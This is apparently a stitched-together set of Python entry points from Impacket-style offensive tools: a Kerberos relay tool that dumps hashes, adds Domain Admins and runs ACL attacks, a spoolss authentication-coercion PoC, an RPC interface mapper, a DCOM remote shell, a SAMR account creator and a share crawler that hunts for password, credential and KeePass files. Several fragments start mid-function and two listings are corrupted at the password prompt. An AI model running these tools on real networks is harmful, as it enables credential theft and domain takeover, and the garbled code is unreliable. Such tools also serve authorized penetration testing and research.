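            # Close the socket explicitly instead of leaving the old one to
            # the garbage collector when the next connect() replaces it.
            dce.disconnect()

        listed = tup in uuidtups
        # Same interface UUID advertised under a different version number.
        otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups)
        if listed or listening:
            print("%r: %s, %s" % (
                tup, "listed" if listed else
                "other version listed" if otherversion else "not listed",
                "listening" if listening else "not listening"))
            if tup[0] in epm.KNOWN_PROTOCOLS:
                print("Protocol: %s" % (epm.KNOWN_PROTOCOLS[tup[0]]))
            else:
                print("Protocol: N/A")

            # Provider table is keyed on the first 18 bytes of the binary UUID.
            provider_key = uuid.uuidtup_to_bin(tup)[:18]
            if provider_key in KNOWN_UUIDS:
                print("Provider: %s" % (KNOWN_UUIDS[provider_key]))
            else:
                print("Provider: N/A")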
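def main():
    """Command-line entry point for the Kerberos relay tool.

    Parses the options, picks the operating mode ('ATTACK' when a target
    or a target file is given, 'EXPORT' otherwise), starts one listener
    per entry in ``RELAY_SERVERS`` and then blocks on stdin until it is
    closed or interrupted.

    Exits with status 1 when the arguments cannot be parsed or when
    ``-hp`` is not valid hex, and with status 0 after stdin is closed.
    """
    def start_servers(options, threads):
        """Create one ``KrbRelayxConfig`` per relay server and start it.

        ``codec``, ``mode``, ``targetSystem``, ``hexpass`` and
        ``PROTOCOL_CLIENTS`` are read from the enclosing scope; all of
        them are assigned before this is called.

        Args:
            options: the parsed argparse namespace.
            threads: set the started server objects are added to.

        Returns:
            The config handed to the last server started, or ``None``
            when ``RELAY_SERVERS`` is empty.
        """
        c = None
        for server in RELAY_SERVERS:
            #Set up config
            c = KrbRelayxConfig()
            c.setProtocolClients(PROTOCOL_CLIENTS)
            c.setTargets(targetSystem)
            c.setExeFile(options.e)
            c.setCommand(options.c)
            c.setEnumLocalAdmins(options.enum_local_admins)
            c.setEncoding(codec)
            c.setMode(mode)
            c.setAttacks(PROTOCOL_ATTACKS)
            c.setLootdir(options.lootdir)
            try:
                c.setLDAPOptions(options.no_dump, options.no_da,
                                 options.no_acl, options.escalate_user)
            except TypeError:
                # Newer version of ntlmrelayx has extra arguments
                c.setLDAPOptions(options.no_dump, options.no_da,
                                 options.no_acl, options.no_validate_privs,
                                 options.escalate_user)
            c.setIPv6(options.ipv6)
            c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
            c.setSMB2Support(not options.no_smb2support)
            c.setInterfaceIp(options.interface_ip)
            if hexpass is not None:
                # Decoded -hp value takes precedence over -p; the trailing
                # flag presumably marks the value as raw bytes — confirm in
                # KrbRelayxConfig.setAuthOptions.
                c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip,
                                 hexpass, options.krbsalt, True)
            else:
                c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip,
                                 options.krbpass, options.krbsalt, False)
            c.setKrbOptions(options.format)

            #If the redirect option is set, configure the HTTP server to redirect targets to SMB
            if server is HTTPKrbRelayServer and options.r is not None:
                c.setMode('REDIRECT')
                c.setRedirectHost(options.r)

            s = server(c)
            s.start()
            threads.add(s)
        return c

    # Init the example's logger theme
    logger.init()

    #Parse arguments
    parser = argparse.ArgumentParser(
        add_help=False,
        description=
        "Kerberos \"relay\" tool. Abuses accounts with unconstrained "
        "delegation to pwn things.")
    parser._optionals.title = "Main options"

    #Main arguments
    parser.add_argument("-h",
                        "--help",
                        action="help",
                        help='show this help message and exit')
    parser.add_argument('-debug',
                        action='store_true',
                        help='Turn DEBUG output ON')
    parser.add_argument(
        '-t',
        "--target",
        action='store',
        metavar='TARGET',
        help='Target to attack, '
        'since this is Kerberos, only HOSTNAMES are valid. Example: smb://server:445 If unspecified, will store tickets for later use.'
    )
    parser.add_argument('-tf',
                        action='store',
                        metavar='TARGETSFILE',
                        help='File that contains targets by hostname or '
                        'full URL, one per line')
    parser.add_argument(
        '-w',
        action='store_true',
        help='Watch the target file for changes and update target list '
        'automatically (only valid with -tf)')

    # Interface address specification
    parser.add_argument('-ip',
                        '--interface-ip',
                        action='store',
                        metavar='INTERFACE_IP',
                        help='IP address of interface to '
                        'bind SMB and HTTP servers',
                        default='')

    parser.add_argument(
        '-r',
        action='store',
        metavar='SMBSERVER',
        help='Redirect HTTP requests to a file:// path on SMBSERVER')
    parser.add_argument(
        '-l',
        '--lootdir',
        action='store',
        type=str,
        required=False,
        metavar='LOOTDIR',
        default='.',
        help='Loot '
        'directory in which gathered loot (TGTs or dumps) will be stored (default: current directory).'
    )
    parser.add_argument(
        '-f',
        '--format',
        default='ccache',
        choices=['ccache', 'kirbi'],
        action='store',
        help='Format to store tickets in. Valid: ccache (Impacket) or kirbi'
        ' (Mimikatz format) default: ccache')
    parser.add_argument(
        '-codec',
        action='store',
        help='Sets encoding used (codec) from the target\'s output (default '
        '"%s"). If errors are detected, run chcp.com at the target, '
        'map the result with '
        'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py '
        'again with -codec and the corresponding codec ' %
        sys.getdefaultencoding())
    # store_true so the flag actually disables SMB2: with store_false and an
    # explicit default=False the option was False whether or not it was
    # given, and setSMB2Support(not ...) was always True.
    parser.add_argument('-no-smb2support',
                        action="store_true",
                        help='Disable SMB2 Support')

    parser.add_argument(
        '-wh',
        '--wpad-host',
        action='store',
        help='Enable serving a WPAD file for Proxy Authentication attack, '
        'setting the proxy host to the one supplied.')
    parser.add_argument(
        '-wa',
        '--wpad-auth-num',
        action='store',
        help=
        'Prompt for authentication N times for clients without MS16-077 installed '
        'before serving a WPAD file.')
    parser.add_argument('-6',
                        '--ipv6',
                        action='store_true',
                        help='Listen on both IPv6 and IPv4')

    # Authentication arguments
    # Note: values given here end up in the process table and shell history,
    # readable by other local users.
    group = parser.add_argument_group(
        'Kerberos Keys (of your account with unconstrained delegation)')
    group.add_argument('-p',
                       '--krbpass',
                       action="store",
                       metavar="PASSWORD",
                       help='Account password')
    group.add_argument('-hp',
                       '--krbhexpass',
                       action="store",
                       metavar="HEXPASSWORD",
                       help='Hex-encoded password')
    group.add_argument(
        '-s',
        '--krbsalt',
        action="store",
        metavar="USERNAME",
        help='Case sensitive (!) salt. Used to calculate Kerberos keys.'
        'Only required if specifying password instead of keys.')
    group.add_argument('-hashes',
                       action="store",
                       metavar="LMHASH:NTHASH",
                       help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-aesKey',
                       action="store",
                       metavar="hex key",
                       help='AES key to use for Kerberos Authentication '
                       '(128 or 256 bits)')
    group.add_argument(
        '-dc-ip',
        action='store',
        metavar="ip address",
        help='IP Address of the domain controller. If '
        'ommited it use the domain part (FQDN) specified in the target parameter'
    )

    #SMB arguments
    smboptions = parser.add_argument_group("SMB attack options")

    smboptions.add_argument(
        '-e',
        action='store',
        required=False,
        metavar='FILE',
        help='File to execute on the target system. '
        'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)'
    )
    smboptions.add_argument(
        '-c',
        action='store',
        type=str,
        required=False,
        metavar='COMMAND',
        help='Command to execute on '
        'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
        'directory).')
    smboptions.add_argument(
        '--enum-local-admins',
        action='store_true',
        required=False,
        help=
        'If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)'
    )

    #LDAP options
    # These use store_false, so each defaults to True and the flag turns the
    # corresponding step off.
    ldapoptions = parser.add_argument_group("LDAP attack options")
    ldapoptions.add_argument('--no-dump',
                             action='store_false',
                             required=False,
                             help='Do not attempt to dump LDAP information')
    ldapoptions.add_argument('--no-da',
                             action='store_false',
                             required=False,
                             help='Do not attempt to add a Domain Admin')
    ldapoptions.add_argument('--no-acl',
                             action='store_false',
                             required=False,
                             help='Disable ACL attacks')
    ldapoptions.add_argument(
        '--no-validate-privs',
        action='store_false',
        required=False,
        help=
        'Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks'
    )
    ldapoptions.add_argument(
        '--escalate-user',
        action='store',
        required=False,
        help='Escalate privileges of this user instead of creating a new one')

    try:
        options = parser.parse_args()
    except Exception as e:
        logging.error(str(e))
        sys.exit(1)

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)
        logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)

    # Decode -hp once, up front, so a malformed value is reported as a
    # clean error instead of a traceback from inside start_servers.
    # (unhexlify raises TypeError on Python 2 and binascii.Error, a
    # ValueError subclass, on Python 3.)
    hexpass = None
    if options.krbhexpass and not options.krbpass:
        try:
            hexpass = binascii.unhexlify(options.krbhexpass)
        except (TypeError, ValueError) as e:
            logging.error("-hp/--krbhexpass is not valid hex: %s" % str(e))
            sys.exit(1)

    # Let's register the protocol clients we have
    # ToDo: Do this better somehow
    from lib.clients import PROTOCOL_CLIENTS

    if options.codec is not None:
        codec = options.codec
    else:
        codec = sys.getdefaultencoding()

    if options.target is not None:
        logging.info("Running in attack mode to single host")
        mode = 'ATTACK'
        targetSystem = TargetsProcessor(singleTarget=options.target,
                                        protocolClients=PROTOCOL_CLIENTS)
    else:
        if options.tf is not None:
            #Targetfile specified
            logging.info("Running in attack mode to hosts in targetfile")
            targetSystem = TargetsProcessor(targetListFile=options.tf,
                                            protocolClients=PROTOCOL_CLIENTS)
            mode = 'ATTACK'
        else:
            logging.info(
                "Running in export mode (all tickets will be saved to disk)")
            targetSystem = None
            mode = 'EXPORT'

    if options.r is not None:
        logging.info("Running HTTP server in redirect mode")

    if targetSystem is not None and options.w:
        watchthread = TargetsFileWatcher(targetSystem)
        watchthread.start()

    threads = set()

    start_servers(options, threads)

    print("")
    logging.info("Servers started, waiting for connections")
    # Block until stdin is closed or the user interrupts.
    try:
        sys.stdin.read()
    except KeyboardInterrupt:
        pass

    # Nothing stops or joins the started servers here; they are torn down
    # by the interpreter exit. (The previous `del s` loop only unbound the
    # loop variable and had no effect on the servers.)
    sys.exit(0)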
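def main():
    """Command-line entry point for the spoolss authentication-coercion PoC.

    Parses credentials and the listener/target hosts, optionally starts
    the local SMB listener, opens the remote printer over RPC and asks
    the target to authenticate back to ``listener``. ``target``,
    ``listener`` and ``debug`` are published as module globals for the
    helper functions; ``show_banner`` is read from module scope.

    Exits via ``sys.exit()`` once the RPC connection is released.
    """

    # globals
    global target
    global listener
    global debug
    global show_banner
    logger.init()

    parser = argparse.ArgumentParser(
        add_help=True,
        description=
        "dementor - rough PoC to connect to spoolss to elicit machine account authentication (implementation by @3xocyte, idea/discovery by @tifkin_, rediscovery and code fixes by @elad_shamir)"
    )
    # Credentials given here are visible in the process table and shell
    # history of the local host.
    parser.add_argument('-u',
                        '--username',
                        action="store",
                        default='',
                        help='valid username')
    parser.add_argument('-p',
                        '--password',
                        action="store",
                        default='',
                        help='valid password')
    parser.add_argument('-d',
                        '--domain',
                        action="store",
                        default='',
                        help='valid domain name')
    parser.add_argument('--ntlm', action="store", default='', help='nt hash')
    parser.add_argument('--server',
                        action='store_true',
                        default=False,
                        help='create smb listener')
    parser.add_argument('--debug',
                        action="store_true",
                        default=False,
                        help='enable debugging')
    parser.add_argument('-q',
                        '--banner',
                        action="store_true",
                        default=False,
                        help='show banner')
    parser.add_argument('listener', help='ip address or hostname of listener')
    parser.add_argument('target', help='ip address or hostname of target')

    options = parser.parse_args()

    domain = options.domain
    username = options.username
    password = options.password
    ntlm = options.ntlm
    server = options.server
    # Module globals consumed by the helper functions.
    listener = options.listener
    target = options.target
    debug = options.debug
    banner = options.banner

    if banner is True:
        print(show_banner)

    if server is True:
        logging.info("starting smb server...")
        server_thread = SMBServer()
        server_thread.daemon = True
        server_thread.start()
        sleep(1)  # ensure server starts before continuing
        logging.info("server running")

    dce = create_connection(domain, username, password, ntlm)
    try:
        handle = call_open_printer(dce)
        grab_hash(dce, handle, listener)
        logging.info("done!")
    finally:
        # Release the RPC connection even if the printer call raises;
        # previously a failure skipped disconnect().
        dce.disconnect()
    sys.exit()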
def main():
    # Entry point of the SMB mini-shell client: parses the target
    # specification and authentication options, then runs commands from
    # -file or drops into an interactive shell.
    # NOTE(review): this listing is garbled below (see the getpass line);
    # the SMB connection and shell set-up are not visible here.
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)
    parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")

    # The password may be embedded in 'target'; anything on the command
    # line is visible in the local process table and shell history.
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                                                       '(KRB5CCNAME) based on target parameters. If valid credentials '
                                                       'cannot be found, it will use the ones specified in the command '
                                                       'line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')

    group = parser.add_argument_group('connection')

    group.add_argument('-dc-ip', action='store', metavar="ip address",
                       help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
                            'the target parameter')
    group.add_argument('-target-ip', action='store', metavar="ip address",
                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                            'This is useful when target is the NetBIOS name and you cannot resolve it')
    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
                       help='Destination port to connect to SMB Server')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re
    # Split '[[domain/]username[:password]@]host'; groups('') substitutes
    # '' for every part that is absent.
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
        options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if options.target_ip is None:
        options.target_ip = address

    # Never true after groups(''), which already maps a missing domain to ''.
    if domain is None:
        domain = ''

    # Prompt only when a user was named and no other secret was supplied.
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        # NOTE(review): the listing is corrupted on the next line — the code
        # between the getpass() call and the "Executing commands" log
        # (including the try: that the block below belongs to) is missing.
        password = getpass("Password:"******"Executing commands from %s" % options.file.name)
            # Lines starting with '#' are echoed, all others are executed.
            for line in options.file.readlines():
                if line[0] != '#':
                    print("# %s" % line, end=' ')
                    shell.onecmd(line)
                else:
                    print(line, end=' ')
        else:
            shell.cmdloop()
    except Exception as e:
        # Full traceback only at DEBUG level; otherwise a one-line error.
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        logging.error(str(e))
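def main(args):
  """Enumerate the DCE/RPC interfaces reachable on a remote endpoint.

  Connects to ``ncacn_ip_tcp:<host>`` on ``<port>``, asks the endpoint's
  management interface which interface IDs it reports, then attempts a
  bind against every UUID in that list and in the local ``uuid_database``
  and prints, for each one that is listed or answers, whether it is
  listed, listening, and which protocol/provider it is known as.

  Args:
    args: command-line arguments, expected to be ``[host, port]``.

  Returns:
    1 when the arguments are malformed; ``None`` otherwise.

  Raises:
    ValueError: if ``port`` is not an integer.
    rpcrt.DCERPCException: any bind fault other than
      ``abstract_syntax_not_supported`` is propagated unchanged.
  """
  # Init the example's logger theme
  logger.init()
  if len(args) != 2:
    print("usage: ./ifmap.py <host> <port>")
    return 1

  host = args[0]
  port = int(args[1])

  stringbinding = "ncacn_ip_tcp:%s" % host
  trans = transport.DCERPCTransportFactory(stringbinding)
  trans.set_dport(port)

  dce = trans.get_dce_rpc()
  dce.connect()

  dce.bind(mgmt.MSRPC_UUID_MGMT)

  ifids = mgmt.hinq_if_ids(dce)

  # Interfaces the endpoint itself reports, as (uuid, version) tuples.
  uuidtups = set(
    uuid.bin_to_uuidtup(ifids['if_id_vector']['if_id'][index]['Data'].getData())
    for index in range(ifids['if_id_vector']['count'])
  )

  dce.disconnect()

  # Probe the reported set plus the local database, so interfaces the
  # endpoint does not report can still be detected.
  probes = uuidtups | uuid_database

  for tup in sorted(probes):

    dce.connect()

    binuuid = uuid.uuidtup_to_bin(tup)
    try:
      dce.bind(binuuid)
    except rpcrt.DCERPCException as e:
      # A rejected interface is the expected negative result; any other
      # fault is a genuine error and is propagated.
      if str(e).find('abstract_syntax_not_supported') >= 0:
        listening = False
      else:
        raise
    else:
      listening = True

    # Close this probe's connection before the next connect(); the
    # previous version reconnected without releasing the old socket.
    dce.disconnect()

    listed = tup in uuidtups
    # Same UUID reported with another version number.
    otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups)
    if listed or listening:
      print("%r: %s, %s" % (
        tup,
        "listed" if listed else "other version listed" if otherversion else "not listed",
        "listening" if listening else "not listening"
      ))
      if tup[0] in epm.KNOWN_PROTOCOLS:
        print("Protocol: %s" % (epm.KNOWN_PROTOCOLS[tup[0]]))
      else:
        # Label was misspelled "Procotol" in the previous version.
        print("Protocol: N/A")

      # KNOWN_UUIDS is keyed on the first 18 bytes of the binary UUID.
      if binuuid[:18] in KNOWN_UUIDS:
        print("Provider: %s" % (KNOWN_UUIDS[binuuid[:18]]))
      else:
        print("Provider: N/A")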
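def main():
    """Command-line entry point for the offline registry hive reader.

    Opens the hive given as the first positional argument and dispatches
    on the chosen sub-command (enum_key, enum_values, get_value,
    get_class, walk) to the matching helper in this file.

    Exits with status 1 when no arguments or no sub-command are given.
    The hive is always closed, even if the helper raises.
    """
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)

    parser = argparse.ArgumentParser(
        add_help=True, description="Reads data from registry hives.")

    parser.add_argument('hive', action='store', help='registry hive to open')
    subparsers = parser.add_subparsers(help='actions', dest='action')
    # A enum_key command
    enumkey_parser = subparsers.add_parser(
        'enum_key',
        help='enumerates the subkeys of the specified open registry key')
    enumkey_parser.add_argument('-name',
                                action='store',
                                required=True,
                                help='registry key')
    enumkey_parser.add_argument('-recursive',
                                dest='recursive',
                                action='store_true',
                                required=False,
                                help='recursive search (default False)')

    # A enum_values command
    enumvalues_parser = subparsers.add_parser(
        'enum_values',
        help='enumerates the values for the specified open registry key')
    enumvalues_parser.add_argument('-name',
                                   action='store',
                                   required=True,
                                   help='registry key')

    # A get_value command
    getvalue_parser = subparsers.add_parser(
        'get_value',
        help='retrieves the data for the specified registry value')
    getvalue_parser.add_argument('-name',
                                 action='store',
                                 required=True,
                                 help='registry value')

    # A get_class command
    getclass_parser = subparsers.add_parser(
        'get_class',
        help='retrieves the data for the specified registry class')
    getclass_parser.add_argument('-name',
                                 action='store',
                                 required=True,
                                 help='registry class name')

    # A walk command
    walk_parser = subparsers.add_parser(
        'walk', help='walks the registry from the name node down')
    walk_parser.add_argument(
        '-name',
        action='store',
        required=True,
        help='registry class name to start walking down from')

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # argparse does not require a sub-command by default, so a hive with no
    # action leaves options.action as None and .upper() would trace back.
    if options.action is None:
        parser.print_help()
        sys.exit(1)

    reg = winregistry.Registry(options.hive)

    try:
        # The sub-parser names are validated by argparse, so no other
        # value can reach this dispatch.
        action = options.action.upper()
        if action == 'ENUM_KEY':
            print("[%s]" % options.name)
            enumKey(reg, options.name, options.recursive)
        elif action == 'ENUM_VALUES':
            enumValues(reg, options.name)
        elif action == 'GET_VALUE':
            getValue(reg, options.name)
        elif action == 'GET_CLASS':
            getClass(reg, options.name)
        elif action == 'WALK':
            walk(reg, options.name)
    finally:
        # Close the hive even when a helper raises; previously an
        # exception skipped close().
        reg.close()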
    if options.command == 'list':
        if options.object == 'user':
            users = samr_connection.list_users(remote_name, options.target_ip)
            for user in users:
                print(user)
        elif options.object == 'group':
            groups = samr_connection.list_groups(remote_name,
                                                 options.target_ip)
            for group in groups:
                print(group)
    elif options.command == 'create':
        if options.object == 'user':
            samr_connection.create_user(remote_name, options.target_ip,
                                        options.name, USER_NORMAL_ACCOUNT)
        elif options.object == 'group':
            samr_connection.create_group(remote_name, options.target_ip,
                                         options.name)


if __name__ == '__main__':
    # Init the example's logger theme
    logger.init()
    # Explicitly changing the stdout encoding format: when stdout has no
    # encoding (output redirected to a file) wrap it in a UTF-8 writer.
    # NOTE(review): codecs.getwriter over sys.stdout is a Python 2 idiom;
    # confirm it is still wanted if this script runs under Python 3.
    stdout_encoding = sys.stdout.encoding
    if stdout_encoding is None:
        sys.stdout = codecs.getwriter('utf8')(sys.stdout)
    print(version.BANNER)

    main()
        if k=='username':
            username=v
        elif k=='password':
            password=v
        elif k=='domain':
            domain=v
        else:
            raise AuthFileSyntaxError(path, lineno, 'Unknown option %s' % repr(k))

    return (domain, username, password)

# Process command-line arguments.
# NOTE(review): this excerpt ends right after the parser is built; the
# parse_args() call and everything that uses the options are not shown.
if __name__ == '__main__':
    # Init the example's logger theme
    logger.init()
    print version.BANNER

    parser = argparse.ArgumentParser(add_help = True, description = "Executes a semi-interactive shell using the "
                                                                    "ShellBrowserWindow DCOM object.")
    # The password may be embedded in 'target'; anything on the command
    # line is visible in the local process table and shell history.
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-share', action='store', default = 'ADMIN$', help='share where the output will be grabbed from '
                                                                           '(default ADMIN$)')
    parser.add_argument('-nooutput', action='store_true', default = False, help='whether or not to print the output '
                                                                                '(no SMB connection created)')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    parser.add_argument('-object', choices=['ShellWindows', 'ShellBrowserWindow', 'MMC20'], nargs='?', default='ShellWindows',
                        help='DCOM object to be used to execute the shell command (default=ShellWindows)')

    # nargs='*' yields a list when arguments are given, but the default is
    # the string ' ' — the consumer must accept both forms.
    parser.add_argument('command', nargs='*', default = ' ', help='command to execute at the target. If empty it will '
                                                                  'launch a semi-interactive shell')
def main():
    # Entry point of the share-search client: parses the target and
    # authentication options, builds the filename filter list and runs
    # GetInterestingFiles over the chosen share.
    # NOTE(review): this listing is garbled below (see the getpass line);
    # the SMB connection set-up and the start of the filter selection are
    # not visible here.
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)
    parser = argparse.ArgumentParser(add_help=True,
                                     description="SMB client implementation.")

    # The password may be embedded in 'target'; anything on the command
    # line is visible in the local process table and shell history.
    parser.add_argument(
        'target',
        action='store',
        help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument(
        '-ff',
        type=argparse.FileType('r'),
        help=
        'file containing search filters, one filter each line. filters are used '
        'to assess whether or not a filename is interesting. Wildcards are accepted.'
        ' If no file is provided, the following filters will apply: "*password*", '
        '"*sensitive*", "*admin*", "*login*", "*secret*", "unattend*.xml", '
        '"*.vmdk", "*creds*", "*credential*", "*.config", "*.kdbx"')
    parser.add_argument('-share',
                        action="store",
                        metavar="Share name",
                        help='Required. Name of the share to search in',
                        required=True)
    # Relative to the current working directory; the actual default value
    # carries a trailing slash.
    parser.add_argument(
        '-of',
        action="store",
        metavar="Output folder",
        default='saved_files/',
        help=
        'Folder on the local machine where the interesting files will be saved. '
        'Defaults to "saved_files"')
    parser.add_argument('-path',
                        action="store",
                        metavar="PATH",
                        default='\\',
                        help='Path in the selected share to start the search. '
                        'Defaults to the root folder "\\"')
    parser.add_argument(
        '-depth',
        action="store",
        metavar="Number",
        default=0,
        help=
        'Depth of the search in the share subfolders. Defaults to 0 (no depth limit)',
        type=int)
    parser.add_argument(
        '-max_file_size',
        action="store",
        metavar="Number",
        default=0,
        help=
        'Maximum size of interesting files in bytes. If exceeded, the file will not be downloaded. '
        'Defaults to 0 (no file size limit)',
        type=int)
    parser.add_argument(
        '-list-only',
        action="store_true",
        help='Switch: only list interesting files and don\'t download them')
    parser.add_argument(
        '-list-all',
        action="store_true",
        help='Switch: list all files without filtering and don\'t download them'
    )
    parser.add_argument('-debug',
                        action='store_true',
                        help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes',
                       action="store",
                       metavar="LMHASH:NTHASH",
                       help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass',
                       action="store_true",
                       help='don\'t ask for password (useful for -k)')
    group.add_argument(
        '-k',
        action="store_true",
        help='Use Kerberos authentication. Grabs credentials from ccache file '
        '(KRB5CCNAME) based on target parameters. If valid credentials '
        'cannot be found, it will use the ones specified in the command '
        'line')
    group.add_argument('-aesKey',
                       action="store",
                       metavar="hex key",
                       help='AES key to use for Kerberos Authentication '
                       '(128 or 256 bits)')

    group = parser.add_argument_group('connection')

    group.add_argument(
        '-dc-ip',
        action='store',
        metavar="ip address",
        help=
        'IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
        'the target parameter')
    group.add_argument(
        '-target-ip',
        action='store',
        metavar="ip address",
        help=
        'IP Address of the target machine. If omitted it will use whatever was specified as target. '
        'This is useful when target is the NetBIOS name and you cannot resolve it'
    )
    group.add_argument('-port',
                       choices=['139', '445'],
                       nargs='?',
                       default='445',
                       metavar="destination port",
                       help='Destination port to connect to SMB Server')

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re
    # Split '[[domain/]username[:password]@]host'; groups('') substitutes
    # '' for every part that is absent.
    domain, username, password, address = re.compile(
        '(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
            options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if options.target_ip is None:
        options.target_ip = address

    # Never true after groups(''), which already maps a missing domain to ''.
    if domain is None:
        domain = ''

    # Prompt only when a user was named and no other secret was supplied.
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        # NOTE(review): the listing is corrupted on the next line — the code
        # between the getpass() call and the '["*"]' filter assignment
        # (including the try: that the block below belongs to) is missing.
        password = getpass("Password:"******"*"]
        elif options.ff is not None:
            # Filters are lower-cased here; the default list below is not.
            for line in options.ff.readlines():
                filters.append(line.replace('\n', '').lower())
        else:
            filters = [
                "*password*", "*sensitive*", "*admin*", "*login*", "*secret*",
                "unattend*.xml", "*.vmdk", "*creds*", "*credential*",
                "*.config", "*.kdbx"
            ]
        if options.list_only is True or options.list_all is True:
            download_files = False
        else:
            download_files = True

        logging.debug("Starting the search with the following filters: %s" %
                      (', '.join('"{0}"'.format(f) for f in filters)))

        # NOTE(review): file names come from the remote share and are saved
        # under options.of; confirm GetInterestingFiles sanitizes them
        # before joining them to the local output folder.
        finder = GetInterestingFiles(smbClient, options.share, options.path,
                                     filters, options.of, options.depth,
                                     options.max_file_size, download_files)
        finder.do_recursive()

        logging.info(
            "Search completed. saved files (if any) are to be found in the following folder: %s"
            % (options.of))
    except Exception as e:
        # Full traceback only at DEBUG level; otherwise a one-line error.
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        logging.error(str(e))